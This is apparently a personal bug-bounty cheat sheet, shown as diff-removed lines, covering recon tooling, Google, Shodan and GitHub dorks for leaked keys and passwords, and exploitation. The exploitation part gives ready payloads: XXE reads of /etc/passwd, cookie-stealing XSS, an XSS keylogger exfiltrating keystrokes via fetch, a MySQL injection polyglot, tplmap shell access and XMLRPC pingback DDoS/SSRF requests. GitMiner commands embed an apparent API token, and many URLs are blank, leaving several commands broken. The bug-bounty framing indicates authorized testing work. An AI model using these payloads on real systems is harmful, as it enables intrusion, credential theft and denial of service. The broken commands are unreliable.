    591  -grep -r phpinfo
    592  - 
    593  -Use this wordlist
    594  - 
    595  -
    596  - 
    597  -etc etc
    598  -```
    599  - 
    600  -**DirSearching with FFUF (New Method)**
    601  - 
    602  -```
    603  -#
    604  - 
    605  -Written in Go so very fast
    606  - 
    607  -Directory Fuzzing
    608  - 
    609  -ffuf -c -w /path/to/wordlist -u
    610  - 
    611  -GET Parameter Fuzzing
    612  - 
    613  -ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
    614  - 
    615  -POST Data Fuzzing
    616  - 
    617  -ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401
    618  - 
    619  -```
    620  - 
    621  -**DirSearching with FFUF Loop (September 2020)**
    622  - 
    623  -```
    624  -ffufhttpservices(){
    625  -for i in $(cat newsubs.httprobe); do ffuf -u $i/FUZZ -w /root/Wordlists/NewWordlist.txt \
    626  --H "User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100" -H "X-Forwarded-For:" \
    627  --c -fs 0 -t 30 -mc 200 -recursion ; done | tee xxxxx;
    628  -cat xxxxx | egrep -v "Method|Header|Follow|Calib|Timeout|Thread|Matc|Filt|v1|_|^$" | tee ffuf.results; rm xxxxx;
    629  - 
    630  -#Need to add a check if http/https both exist to only run https mayb?
    631  -}
    632  -```
    633  - 
    634  -**EyeWitness - Source View**
    635  - 
    636  -```
    637  -Recently while working on big programs I have had some success with grepping the EyeWitness source for sensitive files for example
    638  - 
    639  -VPS:> cd EyeWitness
    640  -VPS:> grep -r Tomcat
    641  -VPS:> grep -r IIS6.0
    642  - 
    643  - 
    644  -etc etc
    645  - 
    646  -When EyeWitness runs it will save the source of the URLs it screenshots inside the working folder
    647  -```
    648  - 
    649  -**WaybackURLs - Fetch all URL’s that WayBackMachine Knows About a Domain**
    650  - 
    651  -```
    652  -#
    653  - 
    654  - 
    655  -cat subdomains | waybackurls > urls
    656  -```
    657  - 
    658  -** Direct URL Access - Really Good**
    659  - 
    660  -```
    661  -**&output=text&fl=original&collapse=urlkey
    662  -```
    663  - 
    664  -**GetAllURL’s**
    665  - 
    666  -```
    667  -Bash alias already created in profile on VPS - getallurls or getallurlsloop
    668  -```
    669  - 
    670  -**GoSpider**
    671  - 
    672  -```
    673  -#
    674  - 
    675  -- Run with single site
    676  - 
    677  -gospider -s "" -c 10 -d 1
    678  - 
    679  -- Run with 20 sites & 10 bots each site
    680  - 
    681  -gospider -S sites.txt -o output -c 10 -d 1 -t 20
    682  - 
    683  - 
    684  -```
    685  - 
    686  -**Tomnomnom’s Concurl**
    687  - 
    688  -```
    689  -#
    690  - 
    691  - 
    692  -▶ cat urls.txt
    693  -
    694  -
    695  -
    696  - 
    697  -▶ cat urls.txt | concurl -c 3
    698  -out/
    699  -out/
    700  -out/
    701  - 
    702  -▶ head -n 7 out/
    703  -cmd: curl --silent
    704  - 
    705  - 
    706  - 
    707  -Concurrent HTTP Requests because Go is fast as f
    708  -```
    709  - 
    710  -**Get All Subdomain HTTP Headers & Responses**
    711  - 
    712  -```
    713  -#Reference:
    714  - 
    715  -Cool little bash loop to handle this, we will loop through all the found http/https servers from httprobe and grab the headers and responses.
    716  - 
    717  -Great way to find legacy web servers or quickly check the reponses to find easy wins.
    718  - 
    719  -Stored as in my repo :)
    720  - 
    721  -Todo: I will rewrite this to support Tomnomnoms concurl to carry out concurrent http requests when I have time :)
    722  - 
    723  - 
    724  -#!/bin/bash
    725  -mkdir headers
    726  -mkdir responsebody
    727  -CURRENT_PATH=$(pwd)
    728  -for x in $(cat $1)
    729  -do
    730  - NAME=$(echo $x | awk -F/ '{print $3}')
    731  - curl -X GET -H "X-Forwarded-For:" $x -I > "$CURRENT_PATH/headers/$NAME"
    732  - curl -s -X GET -H "X-Forwarded-For:" -L $x > "$CURRENT_PATH/responsebody/$NAME"
    733  -done
    734  - 
    735  - 
    736  -In the next step I will show how we can use the collected data to grab all Javascript files from the endpoints :) There is also another way with JSearch which I will show further down.
    737  -```
    738  - 
    739  -**Collecting JavaScript Files**
    740  - 
    741  -```
    742  -#Reference:
    743  - 
    744  -This script will crawl all the responses from the previous script and store all javascripts files inside
    745  - 
    746  -This is a good tactic as sometimes devs will hardcore API keys/tokens etc in Javascript files without realising.
    747  - 
    748  -Stored as in my repo :)
    749  - 
    750  -#!/bin/bash
    751  -mkdir scripts
    752  -mkdir scriptsresponse
    753  -RED='\033[0;31m'
    754  -NC='\033[0m'
    755  -CUR_PATH=$(pwd)
    756  -for x in $(ls "$CUR_PATH/responsebody")
    757  -do
    758  - printf "\n\n${RED}$x${NC}\n\n"
    759  - END_POINTS=$(cat "$CUR_PATH/responsebody/$x" | grep -Eoi "src=\"[^>]+></script>" | cut -d '"' -f 2)
    760  - for end_point in $END_POINTS
    761  - do
    762  - len=$(echo $end_point | grep "http" | wc -c)
    763  - mkdir "scriptsresponse/$x/"
    764  - URL=$end_point
    765  - if [ $len == 0 ]
    766  - then
    767  - URL="https://$x$end_point"
    768  - fi
    769  - file=$(basename $end_point)
    770  - curl -X GET $URL -L > "scriptsresponse/$x/$file"
    771  - echo $URL >> "scripts/$x"
    772  - done
    773  -done
    774  - 
    775  - 
    776  -This method can be a little slow as there is no multithreading involved, but works perfect for smaller programs :)
    777  -```
    778  - 
    779  -**JavaScript Link Finder**
    780  - 
    781  -```
    782  -#
    783  - 
    784  -LinkFinder is one of the best tools for parsing endpoints from JavaScript files. The tool works by using JSBeautifier under the hood alongside a list of regexes to find URL patterns.
    785  - 
    786  -We can simple pass a .js file locally and it will parse all links contained within the JS files, great for finding endpoints.
    787  - 
    788  -Of course if we combine this with the technique above we can usually find quite a lot.
    789  - 
    790  -python $Tools/LinkFinder -i m0chan.js -o cli
    791  -```
    792  - 
    793  -**JsSearch**
    794  - 
    795  -```
    796  -#
    797  - 
    798  -JsSearch is another handy JavaScript parser except this tool aims to find sensitive or interesting strings within JSFiles instead of endpoints. As we know sometimes developers can hardcore API keys etc in JS files and forget.
    799  - 
    800  -python3.7 $Tools/jsearch/ -u -n Starbucks
    801  - 
    802  -This tool is handy as it does not require the files to be stored locally and can simply take a domain as input and recursively crawl and analyse.
    803  - 
    804  -Although I recommened you add your own regexes as the default colletion is quite minimal.
    805  - 
    806  - 
    807  -```
    808  - 
    809  -**Finding Hidden Endpoints from Scraped JS Files**
    810  - 
    811  -```
    812  -#Reference:
    813  - 
    814  -#Dependancy:
    815  - 
    816  -Similar to the previous scripts this bash script will require the previous scripts to be run as it relys on the output.
    817  - 
    818  -What we do here is parse the relative paths present in the scraped JS Files, this way we can find some interesting endpoints and configurations which may have some vulnerable parameters.
    819  - 
    820  -Providing we have 'relative-url-extractor' installed we can use the following bash script to achieve what we need.
    821  - 
    822  -Stored in my Repo as
    823  - 
    824  -#!/bin/bash
    825  -#looping through the scriptsresponse directory
    826  -mkdir endpoints
    827  -CUR_DIR=$(pwd)
    828  -for domain in $(ls scriptsresponse)
    829  -do
    830  - #looping through files in each domain
    831  - mkdir endpoints/$domain
    832  - for file in $(ls scriptsresponse/$domain)
    833  - do
    834  - ruby ~/relative-url-extractor/extract.rb scriptsresponse/$domain/$file >> endpoints/$domain/$file
    835  - done
    836  -done
    837  - 
    838  - 
    839  -```
    840  - 
    841  -**Fuzzing URL Parameters**
    842  - 
    843  -```
    844  -#
    845  -#
    846  - 
    847  -GET Bruteforce
    848  - 
    849  -$ go run aron.go -url -get
    850  -$ go run aron.go -url<[?|id=1|id=1&]> -get
    851  -$ go run aron.go -url<[?|id=1|id=1&]> -get -wordlist $Tools/Aron/dict.txt
    852  - 
    853  - 
    854  -POST Bruteforce
    855  - 
    856  -$ go run aron.go -url -post
    857  -$ go run aron.go -url<[?id=1]> -post
    858  -$ go run aron.go -url<[?id=1]> -post -data "user=1"
    859  -$ go run aron.go -url<[?id=1]> -post -data "user=1" -wordlist dict.txt
    860  -```
    861  - 
    862  -**Port Scanning Subdomains**
    863  - 
    864  -```
    865  -I won't get into this much as it's fairly straight forward, simply parse your subdomains.resolved too nmap with your preferred syntax and let it run away.
    866  - 
    867  -Small Tips:
    868  - 
    869  -1) Run this on a VPS ( is my go-to)
    870  -2) Run inside a screen session with Screen -SmL
    871  -3) Pipe the output with | tee
    872  - 
    873  -Btw, some people will tell you to use massscan due to the speed but I find it misses a lot of ports so VPS+ nMap + Screen is the most reliable.
    874  -```
    875  - 
    876  -**Aquatone**
    877  - 
    878  -```
    879  -#
    880  - 
    881  -Aquatone allows us to easily screenshot and port scan subdomains. Very fast as it is written in Go.
    882  - 
    883  -cat hosts.txt | aquatone -ports 80,443,3000,3001
    884  - 
    885  -small: 80, 443
    886  -medium: 80, 443, 8000, 8080, 8443 (same as default)
    887  -large: 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888
    888  -xlarge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 12443, 16080, 18091, 18092, 20720, 28017
    889  -```
    890  - 
    891  -#### Google Dorks
    892  - 
    893  -#### Bug Bounty Helper Tool (Perfect for All Dorks) <a href="#bug-bounty-helper-tool-perfect-for-all-dorks" id="bug-bounty-helper-tool-perfect-for-all-dorks"></a>
    894  - 
    895  -```
    896  -
    897  - 
    898  -Just enter your domain/subdomain and select which you would like to dork for
    899  -```
    900  - 
    901  -```
    902  -
    903  - 
    904 inurl:id=
    905 filetype:php
    906 intitle:upload
    907  -inurl:”.php?id=” intext:”View cart”
    908  -inurl:”.php?cid=” intext:”shopping”
    909  -inurl:/news.php?include=
    910  -inurl:”.php?query=”
    911  - 
    912  - 
    913  -#Open Redirect
    914  -inurl:url=https
    915  -inurl:url=http
    916  -inurl:u=https
    917  -inurl:u=http
    918  -inurl:redirect?https
    919  -inurl:redirect?http
    920  -inurl:redirect=https
    921  -inurl:redirect=http
    922  -inurl:link=http
    923  -inurl:link=https
    924  -inurl:redirectUrl=http
    925  - 
    926  -#Codepad - Online Interpreter/Compiler, Sometimes Hard Coded Creds
    927 "Tesla"
    928  - 
    929  -#Scribd - EBooks / Although Sometimes Internal Files
    930 "Tesla"
    931  - 
    932  -#NodeJS Source
    933 "Tesla"
    934 "Tesla"
    935  - 
    936  -#Libararies IO
    937 "Tesla"
    938  - 
    939  -#Coggle - MindMapping Software
    940 "Tesla"
    941  - 
    942  -#Papaly
    943 "Tesla"
    944  - 
    945  -#Trello - Board Software
    946 "Tesla"
    947  - 
    948  -#Prezi - Presentation Software
    949 "Tesla"
    950  - 
    951  -#JSDeliver - CDN for NPM & GitHub
    952 "Tesla"
    953  - 
    954  -#Codepen - Online Coding Tool
    955 "Tesla"
    956  - 
    957  -#Pastebin - Online Txt Sharing
    958 "Tesla"
    959  - 
    960  -#Repl - Online Compiler
    961 "Tesla"
    962  - 
    963  -#Gitter - Open Source Messaging
    964 "Tesla"
    965  - 
    966  -#BitBucket - Similar to GitHub can Store Source Code
    967 "Tesla"
    968  - 
    969  -#Atlassian - Useful to find Confluence and Jira
    970  -site:* "Tesla"
    971  - 
    972  -#Gitlab - Source Code
    973  -inurl:gitlab "Tesla"
    974  - 
    975  -#Find S3 Buckets
    976 "Tesla"
    977  - 
    978  -To simplify this process I copy the above into Sublime and copy replace Tesla with the Target name and then open all queries at once with the following chrome extension ;)
    979  - 
    980  -
    981  - 
    982  -We can also find specific content by appending the "ext:pdf or ext:conf" etc etc
    983  -```
    984  - 
    985  -### Fingerprinting
    986  - 
    987  -During our recon phase and the techniques we employed above we gathered a lot of information about a target from subdomains, CIDR, ASN’s, Endpoints etc but we didn’t really gather HTTP Headers. I did show a few techniques but they probably fit in here more so I’ve just duplicated them for simplicity.
    988  - 
    989  -Fingerprinting usually consists of using our discovered endpoints and analysing the headers,version numbers, open/closed ports etc.
    990  - 
    991  -First technique is typically finding the open ports which we could do with nMap but it will take a while especially if we are working on a big program perhaps with tens of thousands of IP’s. If this is the case then it’s probably best to look at Shodan.
    992  - 
    993  -Shodan Scans the entire internet on a daily basis and provides the data to it’s users **(I highly recommend you get a pro account)**
    994  - 
    995  -**Shodan Port Scan w/ CIDR**
    996  - 
    997  -```
    999  - 
    1000  -net:CIDR/24,CIDR/24
    1001  - 
    1002  -Example
    1003  - 
    1004  -net:,
    1005  - 
    1006  -You could also search via Organistations Name with
    1007  -org:Paypal
    1008  - 
    1009  -Of course these techniques will only return assets on your targets OWN external network but what about resources hosted with thirdparty cloud providers such as AWS or Azure. One Techn to find these is to search with SSL
    1010  - 
    1011  -ssl:paypal
    1012  -```
    1013  - 
    1014  -**MassScan**
    1015  - 
    1016  -```
    1017  -#
    1018  - 
    1019  -MassScan is awesome but truthfully from my experiences it can be very hit or miss and sometimes misses ports, I have tried scanning my VPS with it and it dosent show half the ports. No idea why however its still worth mentioning due to the speed
    1020  - 
    1021  -sudo masscan -p<Port Here> <CIDR Range Here> --exclude <Exclude IP> --
    1022  -banners -oX <Out File Name>
    1023  - 
    1024  -You can also use the massscan-web-ui from OffSec or grep the results.
    1025  - 
    1026  -
    1027  -```
    1028  - 
    1029  -**Wappalyzer**
    1030  - 
    1031  -```
    1032  -#
    1033  - 
    1034  - 
    1035  -One of the best tools for identifying the technologies in use on a site, I prefer the chrome plugin or firefox but the script above also works :)
    1036  -```
    1037  - 
    1038  -**WafW00f**
    1039  - 
    1040  -```
    1041  -#
    1042  - 
    1043  -Awesome script to detect if your target is protected behind an XSS before you started launching payloads.
    1044  - 
    1045  -There are also a few cool Burp plugins to faciliate this.
    1046  - 
    1047  -The great thing about Wafw00f is it will try detect which WAF is in place, for ex. Akami. Once we know the WAF in play we can start lookin for bypasses and other bug submissions that have bypassed this and tailor our payloads to our needs.
    1048  -```
    1049  - 
    1050  -### Finding Sensitive Loot
    1051  - 
    1052  -I wasn’t sure if I should put this under Exploitation but guess it’s own section is fitting, a few techniques to find sensitive files that may have been pushed to github etc.
    1053  - 
    1054  -**Github Dorking**
    1055  - 
    1056  -```
    1057  -Similar to Shodan dorks etc we can pass dorks ot github to search repos alongside certain search terms such as filename etc
    1058  - 
    1059  -For example
    1060  - 
    1061  -filename:.bash_history
    1062  -filename:id_rsa
    1063  -filename:token
    1064  -filename:apikey
    1065  -language:python username
    1066  -language:python:username
    1067  - 
    1068  -app.secret.key is also a good one to search for.
    1069  - 
    1070  - 
    1071  -There is a awesome list of dorks located here
    1072  - 
    1073  -#
    1074  - 
    1075  - 
    1076  -Its very common for devs to accidently push
    1077  -```
    1078  - 
    1079  -![](\*ddmcCZ14kuMdHBPC.png)
    1080  - 
    1081  -**GitMiner**
    1082  - 
    1083  -```
    1084  -#
    1085  - 
    1086  -$:> python3 -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txt
    1087  - 
    1088  -$:> python3 --query 'extension:php "root" in:file AND "" in:file' -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    1089  - 
    1090  -$:> python3 --query 'filename:shadow path:etc' -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    1091  - 
    1092  -$:> python3 --query 'filename:configuration extension:php "public password" in:file' -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    1093  - 
    1094  -Full List of Dorks Here
    1095  - 
    1096  -
    1097  -```
    1098  - 
    1099  -**Finding Subdomains That Resolve to Internal IP**
    1100  - 
    1101  -```
    1102  -cat domains.txt | while read domain; do if host -t A "$domain" | awk '{print $NF}' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then echo $domain; fi; done
    1103  -```
    1104  - 
    1105  -### Exploitation
    1106  - 
    1107  -This is a hard section to type up as some techniques may fall under other headings :) also I probably won’t mention XSS & SQLi as they are the basics and lots of resources already exist.
    1108  - 
    1109  -**Unauthenticated Elastic Search**
    1110  - 
    1111  -```
    1112  -“ES is a document-oriented database designed to store, retrieve, and manage document-oriented or semi-structured data"
    1113  - 
    1114  -Elastic Search has a HTTP Server running on Port 9200 that can be used to query the database and sometimes it supports unauthenticated access.
    1115  - 
    1116  -We can find these servers by scanning for Port 9200 or the Shodan Dork below.
    1117  - 
    1118  -port:"9200" elastic
    1119  -```
    1120  - 
    1121  -**Unauthenticated Docker API**
    1122  - 
    1123  -```
    1124  -Similar to Elastic Search, Docker has some servies that can be exposed that may be an easy win. Mainly when you install docker on system it will pose an API on your localhost on Port 2375. As its on localhost by default you cant interact however in certain instances this is changed and it is available.
    1125  - 
    1126  -Shodan Dorks come in Handy here
    1127  - 
    1128  -port:"2375" docker
    1129  -product:docker
    1130  - 
    1131  -If you find a endpoint you can verifiy that its vulnerable by making a GET request too `/version`
    1132  - 
    1133  -From here you can connect with the CLI version of Docker
    1134  - 
    1135  -docker -H ip:port ps
    1136  -```
    1137  - 
    1138  -**Unauthenticated Kubernetes API**
    1139  - 
    1140  -```
    1141  -First let me say I am no Kubernetes expert but I know it exists and has similar vulns like DockerAPI & Elastic Search and thats all I need to know for hunting.
    1142  - 
    1143  -Kubernetes exposes an unauthenticated REST API on port 10250
    1144  - 
    1145  -Once again we have 2 options, nMap for this port or shodan
    1146  - 
    1147  -product:"kubernetes"
    1148  -port:"10250"
    1149  - 
    1150  -Once a Kubernetes service is detected the first thing to do is to get a list of pods by sending a GET request to the /pods endpoint.
    1151  - 
    1152  - 
    1153  -apt-get install node-ws
    1154  -wscat -c “https://<DOMAIN>:<PORT>/<Location Header Value>” –no-check
    1155  - 
    1156  -Its very easy to get RCE from this method :)
    1157  -```
    1158  - 
    1159  -**Unauthenticated odoo Manager**
    1160  - 
    1161  -```
    1162  -Shodan Dork
    1163  - 
    1164  -http.status:200 http.component:odoo port:8069
    1165  - 
    1166  -After finding instances go to /web/database/manager most of the time there is either no password or it's "admin"
    1167  - 
    1168  -Or simply port scan for 8069
    1169  -```
    1170  - 
    1171  -**Unauthenticated Jenkins Instance**
    1172  - 
    1173  -```
    1174  -Sometimes an application will be running Jenkins which allows Guest/Anonymous signups with /script enabled which allows code exec
    1175  - 
    1176  -Also if you can install plugins there is a terminal plugin
    1177  - 
    1178  -Try dirsearch for /script or use this script to find live Jenkins instances.
    1179  - 
    1180  -Also worth checking Port 8080 alongside 443,80
    1181  - 
    1182  - 
    1183  -I recommened if you are working on a big program with thousands of domains to grep for jenkins and pipe all subdomains into full tcp ports scans. Sometimes the instance can be running on a weird port :)
    1184  - 
    1185  - 
    1186  -Also grep for these headers
    1187  - 
    1188  -X-Hudson: 1.395
    1189  -X-Jenkins: 2.204.2
    1190  -X-Jenkins-Session: d615ef86
    1191  -X-You-Are-Authenticated-As: anonymous
    1192  -X-You-Are-In-Group-Disabled: JENKINS-39402:
    1193  - 
    1194  - 
    1195  -Shodan Dork to Find Open Jenkins Instances
    1196  - 
    1197  -x-jenkins 200
    1198  -```
    1199  - 
    1200  -**XML External Entity (XXE)**
    1201  - 
    1202  -```
    1203  - 
    1204  -#
    1205  - 
    1206  -XML is essential a language designed to transport data in a structured format, ,similar to JSON.
    1207  - 
    1208  -Basic XXE Check
    1209  - 
    1210  -<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM ""><data>&all;</data>
    1211  - 
    1212  -XXE is a vuln that occurs when an application parses XML.
    1213  - 
    1214  - 
    1215  -<?xml version="1.0"?>
    1216  -<!DOCTYPE note [
    1217  -<!ENTITY user "m0chan">
    1218  -<!ENTITY message "m0chanmessage">
    1219  -]>
    1220  - 
    1221  -In this example the ENTITY user holds the info m0chan which can be called with &user
    1222  - 
    1223  -Now this is useful as we get something called EXTERNAL ENTITY which will load the data from a external resource in comparison to something "local"
    1224  - 
    1225  -Examples:
    1226  - 
    1227  -<!DOCTYPE foo [ <!ENTITY ext SYSTEM "" > ]>
    1228  -<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
    1229  - 
    1230  - 
    1231  -We could also combine this with PHP Object Injection (More on that below) to have a payload like this
    1232  - 
    1233  -<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/etc/issue' >]>
    1234  - 
    1235  -Testing the Waters
    1236  - 
    1237  -<?xml version="1.0" encoding="utf-8"?>
    1238  - 
    1239  -Testing the Waters #2
    1240  - 
    1241  - 
    1242  -<?xml version="1.0" encoding="UTF-8"?>
    1243  -<!DOCTYPE test [
    1244  -<!ENTITY % m0chan SYSTEM "file:///etc/passwd">
    1245  -%m0chan;
    1246  -]>
    1247  - 
    1248  -<?xml version="1.0" encoding="ISO-8859-1"?>
    1249  -<!DOCTYPE foo [
    1250  -<!ELEMENT foo ANY >
    1251  -<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    1252  -<foo>
    1253  -&xxe;
    1254  -</foo>
    1255  - 
    1256  - 
    1257  -Base64
    1258  - 
    1259  -<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
    1260  - 
    1261  - 
    1262  -This is the basis, if you want the proper example go and buy the Bug Bounty Playbook.pdf :) Its my favourite book for bug bounty.
    1263  -```
    1264  - 
    1265  -**PHP Object Injection**
    1266  - 
    1267  -```
    1268  -#
    1269  - 
    1270  - 
    1271  -```
    1272  - 
    1273  -**Server-Side-Request-Forgery**
    1274  - 
    1275  -```
    1276  -#
    1277  -I am not going to explain SSRF here as its fairly straight forward and a lot of resources exist, I will drop a few payloads I grabbed off twitter recently though.
    1278  - 
    1279  -For other payloads check out Payload All The Things
    1280  -```
    1281  - 
    1282  -**Amazing SSRF Mindmap - Credit @hackerscrolls**
    1283  - 
    1284  -**Server-Side-Request-Forgery Pt (PDF Convertors)**
    1285  - 
    1286  -```
    1287  -Sometimes you may run into instances where applications are accepting arbitary file types and converting them to PDF, if so we can try inject html/javascript into the input and see if it is interpreted server side.
    1288  - 
    1289  -Server Side JavaScript Execution -> XMLHttpRequest -> SSRF
    1290  - 
    1291  -Also
    1292  - 
    1293  -Server Side JavaScript Execution -> XMLHttpRequest -> Local File Read (file://)
    1294  - 
    1295  -References:
    1296  -
    1297  - 
    1298  -```
    1299  - 
    1300  -**Attacking AWS with SSRF**
    1301  - 
    1302  -```
    1303  -#
    1304  - 
    1305  -Amazon AWS has a internal metadata service which can be queired from most instances which gives us a great local service to try query if we believe the underlying platform is being serviced by AWS such as Elastic Beanstalk etc.
    1306  - 
    1307  -Reference:
    1308  - 
    1309  - 
    1310  - - Local EC2 Instance Address to Query
    1311  - 
    1312  -From here it can be very easy to escalate to RCE by gaining read/write on the bucket and uploading a shell.
    1313  - 
    1314  -```
    1315  - 
    1316  -**GraphQL Injection**
    1317  - 
    1318  -```
    1319  -#
    1320  -More on this soon :)
    1321  - 
    1322  -```
    1323  - 
    1324  -**Server Side Template Injection (SSTI)**
    1325  - 
    1326  -```
    1327  -#
    1328  -More on this soon :)
    1329  - 
    1330  -My primary goto for exploiting SSTI issues is tplmap which is really just sqlmap for template injection vulnerabilities.
    1331  - 
    1332  -#
    1333  - 
    1334  -$ ./ --os-shell -u ''
    1335  - 
    1336  -$ ./ -u ''
    1337  -[+] Tplmap 0.5
    1338  - Automatic Server-Side Template Injection Detection and Exploitation Tool
    1339  - 
    1340  -[+] Testing if GET parameter 'name' is injectable
    1341  -[+] Smarty plugin is testing rendering with tag '{*}'
    1342  -[+] Smarty plugin is testing blind injection
    1343  -[+] Mako plugin is testing rendering with tag '${*}'
    1344  -...
    1345  -[+] Jinja2 plugin is testing rendering with tag ''
    1346  -[+] Jinja2 plugin has confirmed injection with tag ''
    1347  -[+] Tplmap identified the following injection point:
    1348  - 
    1349  - GET parameter: name
    1350  - Engine: Jinja2
    1351  - Injection:
    1352  - Context: text
    1353  - OS: linux
    1354  - Technique: render
    1355  - Capabilities:
    1356  - 
    1357  - Shell command execution: ok
    1358  - Bind and reverse shell: ok
    1359  - File write: ok
    1360  - File read: ok
    1361  - Code evaluation: ok, python code
    1362  - 
    1363  -```
    1364  - 
    1365  -**Cross-Site Web Socket Hijacking (CSWSH)**
    1366  - 
    1367  -```
    1368  - 
    1369  -Websockets are fairly rare but essentially they allow an application too set up a full duplex communcation allowing users to read and post data simultaneously
    1370  - 
    1371  -Common apps using WebSockers are Chat applications as they want to read/send data at the same time.
    1372  - 
    1373  - 
    1374  -CSWSH is similar to CSRF as we use the targets cookie to make the request, we also require the target to visit a page served by us, the difference is instead of sending a POST request in the context of the user we send a websocket connection.
    1375  - 
    1376  -We can use this website to test for the vuln
    1377  - 
    1378  -To Test for this we do the following
    1379  - 
    1380  -1) Log into Website using WebSockets
    1381  -2) Open Second Tab
    1382  -3) Visit Link
    1383  -4) Test if we can make connections as the client.
    1384  - 
    1385  - 
    1386  -There is a nice PoC on the Bug Bounty Playbook
    1387  -```
    1388  - 
    1389  -**Cross-Site Scripting (XSS)**
    1390  - 
    1391  -```
    1392  -#
    1393  - 
    1394  -#
    1395  - 
    1396  -1) Start xss.js phantomjs $HOME/.BurpSuite/bapps/xss.js
    1397  -2) Send Request to Intruder
    1398  -3) Mark Position
    1399  -4) Import xss-payload-list from $Tools into xssValidator
    1400  -5) Change Payload Type to Extension Generated
    1401  -6) Change Payload Process to Invoke-Burp Extension - XSS Validator
    1402  -7) Add Grep-Match rule as per XSS Validator
    1403  -8) Start.
    1404  - 
    1405  - 
    1406  -Succesful Payloads so Far
    1407  - 
    1408  -<p ondragend=[1].map(prompt) draggable="true">dragMe</p>
    1409  - 
    1410  -<img/src=x onerror=prompt(1)>
    1411  - 
    1412  - 
    1413  -I had success recently also by uploading a .html file with pdf magic bytes at the strat with arbitary javascript to obtain stored XSS on a program.
    1414  - 
    1415  -Payload Below:
    1416  - 
    1417  - 
    1418  -%PDF-1.4
    1419  -%äüöß
    1420  -2 0 obj
    1421  -<</Length 3 0 R/Filter/FlateDecode>>
    1422  -stream
    1423  -xœ=ŽË
    1424  -1E÷ùŠ»v“¶é´0è~ àø
    1425  -R
    1426  -R<h1>This is NOT a PDF!</h1> <img src=x onerror=alert(document.cookie)>
    1427  -```
    1428  - 
    1429  -**Cross-Site Scripting Keylogger**
    1430  - 
    1431  -```
    1432  -Easy JavaScript Keylogger with IMG Tags. Useful for XSS with Login Forms present.
    1433  - 
    1434  -<img src=x onerror='document.onkeypress=function(e){fetch(""+String.fromCharCode(e.which))},this.remove();'>
    1435  -```
    1436  - 
    1437  -**XMLRPC.php**
    1438  - 
    1439  -```
    1440  - 
    1441  - 
    1442  -List all Methods
    1443  -<methodCall>
    1444  -<methodName>system.listMethods</methodName>
    1445  -<params></params>
    1446  -</methodCall>
    1447  - 
    1448  - 
    1449  -DDoS
    1450  - 
    1451  -<methodCall>
    1452  -<methodName></methodName>
    1453  -<params><param>
    1454  -<value><string>http://<YOUR SERVER >:<port></string></value>
    1455  -</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
    1456  -</value></param></params>
    1457  -</methodCall>
    1458  - 
    1459  - 
    1460  -SSRF
    1461  - 
    1462  -<methodCall>
    1463  -<methodName></methodName>
    1464  -<params><param>
    1465  -<value><string>http://<YOUR SERVER >:<port></string></value>
    1466  -</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
    1467  -</value></param></params>
    1468  -</methodCall>
    1469  -```
    1470  - 
    1471  -**XXE File Upload SVG**
    1472  - 
    1473  -```
    1474  -#
    1475  - 
    1476  -<?xml version="1.0" encoding="UTF-8"?>
    1477  -<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    1478  -<svg>&xxe;</svg>
    1479  - 
    1480  -<?xml version="1.0" encdoing="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="" xmlns:xlink="" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>
    1481  - 
    1482  -```
    1483  - 
    1484  -**SQL Injection**
    1485  - 
    1486  -```
    1487  - 
    1488  -1)Error generation with untrusted input or special characters.
    1489  -2)Finding total number of columns with order by or group by or having.
    1490  -3)Finding vulnerable columns with union operator.
    1491  -4)Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat().
    1492  -5)Extracting full table and column names with group_concat() and extracting the data with same function.
    1493  -6)Checking file privileges with file_priv.
    1494  -7)Accessing system files with load_file(). and advance exploitation afterwards.
    1495  -WAF evasion if any.
    1496  -```
    1497  - 
    1498  -**Ultimate MySQL Injection Payload (Detetify)**
    1499  - 
    1500  -```
    1501  -#
    1502  - 
    1503  -IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
    1504  - 
    1505  - 
    1506  -```
    1507  - 
    1508  -**JWT Exploiting**
    1509  - 
    1510  -```
    1511  -#
    1512  - 
    1513  -Full details above.
    1514  - 
